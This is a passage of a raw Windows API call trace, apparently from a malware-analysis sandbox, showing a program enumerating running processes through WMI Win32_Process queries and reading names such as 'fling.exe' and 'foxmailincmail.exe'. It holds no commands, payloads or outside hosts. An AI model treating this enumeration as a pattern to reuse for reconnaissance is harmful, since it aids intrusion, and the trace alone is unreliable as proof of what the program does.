[2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5704808) returned 0x0 [0279.390] IUnknown:AddRef (This=0x5704808) returned 0x4 [0279.390] IUnknown:Release (This=0x5704808) returned 0x3 [0279.390] IUnknown:Release (This=0x5704808) returned 0x2 [0279.390] CoTaskMemFree (pv=0x570af78) [0279.391] IUnknown:AddRef (This=0x5704808) returned 0x3 [0279.391] IWbemClassObject:Get (in: This=0x5704808, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.391] IWbemClassObject:Get (in: This=0x5704808, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2888\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.391] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2888\"") returned 0x66 [0279.391] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2888\"") returned 0x66 [0279.391] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.391] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.391] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.391] IUnknown:Release (This=0x500344) returned 0x1 [0279.392] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570af78) returned 0x0 [0279.392] WbemDefPath:IUnknown:QueryInterface (in: This=0x570af78, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.393] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570af78, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5702a50) returned 0x0 [0279.393] WbemDefPath:IUnknown:Release (This=0x570af78) returned 0x0 [0279.393] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702a50, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5702a50) returned 0x0 [0279.393] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702a50, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.393] WbemDefPath:IUnknown:AddRef (This=0x5702a50) returned 0x3 [0279.393] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702a50, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.393] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702a50, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.393] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702a50, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570af88) returned 0x0 [0279.393] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570af88, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.393] WbemDefPath:IUnknown:Release (This=0x570af88) returned 0x3 [0279.394] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702a50, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.394] WbemDefPath:IUnknown:Release (This=0x5702a50) returned 0x2 [0279.394] WbemDefPath:IUnknown:Release (This=0x5702a50) returned 0x1 [0279.394] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702a50, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5702a50) returned 0x0 [0279.394] WbemDefPath:IUnknown:AddRef (This=0x5702a50) returned 0x3 [0279.394] WbemDefPath:IUnknown:Release (This=0x5702a50) returned 0x2 [0279.394] WbemDefPath:IWbemPath:SetText (This=0x5702a50, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2888\"") returned 0x0 [0279.394] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.394] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.394] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.394] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.394] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.394] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.394] IWbemClassObject:Get (in: This=0x5704808, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27ca8ec*=0, plFlavor=0x27ca8f0*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fling.exe", varVal2=0x0), pType=0x27ca8ec*=8, plFlavor=0x27ca8f0*=0) returned 0x0 [0279.395] SysStringByteLen (bstr="fling.exe") returned 0x12 [0279.395] SysStringByteLen (bstr="fling.exe") returned 0x12 [0279.395] IWbemClassObject:Get (in: This=0x5704808, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27ca8ec*=8, plFlavor=0x27ca8f0*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="fling.exe", varVal2=0x0), pType=0x27ca8ec*=8, plFlavor=0x27ca8f0*=0) returned 0x0 [0279.395] SysStringByteLen (bstr="fling.exe") returned 0x12 [0279.395] SysStringByteLen (bstr="fling.exe") returned 0x12 [0279.395] CoTaskMemAlloc (cb=0x4) returned 0x570afb8 [0279.395] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570afb8, puReturned=0x27bb39c | out: apObjects=0x570afb8*=0x57049a0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.396] IUnknown:QueryInterface (in: This=0x57049a0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x57049a0) returned 0x0 [0279.396] IUnknown:QueryInterface (in: This=0x57049a0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.396] IUnknown:QueryInterface (in: This=0x57049a0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.397] IUnknown:AddRef (This=0x57049a0) returned 0x3 [0279.397] IUnknown:QueryInterface (in: This=0x57049a0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.397] IUnknown:QueryInterface (in: This=0x57049a0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.397] IUnknown:QueryInterface (in: This=0x57049a0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x57049a4) returned 0x0 [0279.397] IMarshal:GetUnmarshalClass (in: This=0x57049a4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.397] IUnknown:Release (This=0x57049a4) returned 0x3 [0279.398] IUnknown:QueryInterface (in: This=0x57049a0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.398] IUnknown:Release (This=0x57049a0) returned 0x2 [0279.398] IUnknown:QueryInterface (in: This=0x57049a0, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x57049a0) returned 0x0 [0279.398] IUnknown:AddRef (This=0x57049a0) returned 0x4 [0279.398] IUnknown:Release (This=0x57049a0) returned 0x3 [0279.398] IUnknown:Release (This=0x57049a0) returned 0x2 [0279.398] CoTaskMemFree (pv=0x570afb8) [0279.398] IUnknown:AddRef (This=0x57049a0) returned 0x3 [0279.398] IWbemClassObject:Get (in: This=0x57049a0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.399] IWbemClassObject:Get (in: This=0x57049a0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2896\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.399] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2896\"") returned 0x66 [0279.399] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2896\"") returned 0x66 [0279.399] CoGetObjectContext (in: riid=0x277dff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43ea74 | out: ppv=0x43ea74*=0x500344) returned 0x0 [0279.399] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.399] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.399] IUnknown:Release (This=0x500344) returned 0x1 [0279.400] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570afb8) returned 0x0 [0279.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x570afb8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.400] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570afb8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x5702b30) returned 0x0 [0279.400] WbemDefPath:IUnknown:Release (This=0x570afb8) returned 0x0 [0279.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702b30, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x5702b30) returned 0x0 [0279.400] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702b30, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.401] WbemDefPath:IUnknown:AddRef (This=0x5702b30) returned 0x3 [0279.401] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702b30, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.401] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702b30, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.401] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702b30, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570afc8) returned 0x0 [0279.401] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570afc8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.401] WbemDefPath:IUnknown:Release (This=0x570afc8) returned 0x3 [0279.401] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702b30, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.401] WbemDefPath:IUnknown:Release (This=0x5702b30) returned 0x2 [0279.401] WbemDefPath:IUnknown:Release (This=0x5702b30) returned 0x1 [0279.402] WbemDefPath:IUnknown:QueryInterface (in: This=0x5702b30, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x5702b30) returned 0x0 [0279.402] WbemDefPath:IUnknown:AddRef (This=0x5702b30) returned 0x3 [0279.402] WbemDefPath:IUnknown:Release (This=0x5702b30) returned 0x2 [0279.402] WbemDefPath:IWbemPath:SetText (This=0x5702b30, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2896\"") returned 0x0 [0279.402] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.402] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.402] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.402] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.402] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.402] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.402] IWbemClassObject:Get (in: This=0x57049a0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cb150*=0, plFlavor=0x27cb154*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="foxmailincmail.exe", varVal2=0x0), pType=0x27cb150*=8, plFlavor=0x27cb154*=0) returned 0x0 [0279.402] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0279.402] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0279.402] IWbemClassObject:Get (in: This=0x57049a0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27cb150*=8, plFlavor=0x27cb154*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="foxmailincmail.exe", varVal2=0x0), pType=0x27cb150*=8, plFlavor=0x27cb154*=0) returned 0x0 [0279.402] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0279.402] SysStringByteLen (bstr="foxmailincmail.exe") returned 0x24 [0279.403] CoTaskMemAlloc (cb=0x4) returned 0x570aff8 [0279.403] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570aff8, puReturned=0x27bb39c | out: apObjects=0x570aff8*=0x5704b38, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.404] IUnknown:QueryInterface (in: This=0x5704b38, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5704b38) returned 0x0 [0279.404] IUnknown:QueryInterface (in: This=0x5704b38, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.404] IUnknown:QueryInterface (in: This=0x5704b38, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.404] IUnknown:AddRef (This=0x5704b38) returned 0x3 [0279.404] IUnknown:QueryInterface (in: This=0x5704b38, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.404] IUnknown:QueryInterface (in: This=0x5704b38, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.404] IUnknown:QueryInterface (in: This=0x5704b38, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5704b3c) returned 0x0 [0279.404] IMarshal:GetUnmarshalClass (in: This=0x5704b3c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.404] IUnknown:Release (This=0x5704b3c) returned 0x3 [0279.405] IUnknown:QueryInterface (in: This=0x5704b38, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.405] IUnknown:Release (This=0x5704b38) returned 0x2 [0279.405] IUnknown:QueryInterface (in: This=0x5704b38, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5704b38) returned 0x0 [0279.405] IUnknown:AddRef (This=0x5704b38) returned 0x4 [0279.405] IUnknown:Release (This=0x5704b38) returned 0x3 [0279.405] IUnknown:Release (This=0x5704b38) returned 0x2 [0279.405] CoTaskMemFree (pv=0x570aff8) [0279.406] IUnknown:AddRef (This=0x5704b38) returned 0x3 [0279.406] IWbemClassObject:Get (in: This=0x5704b38, 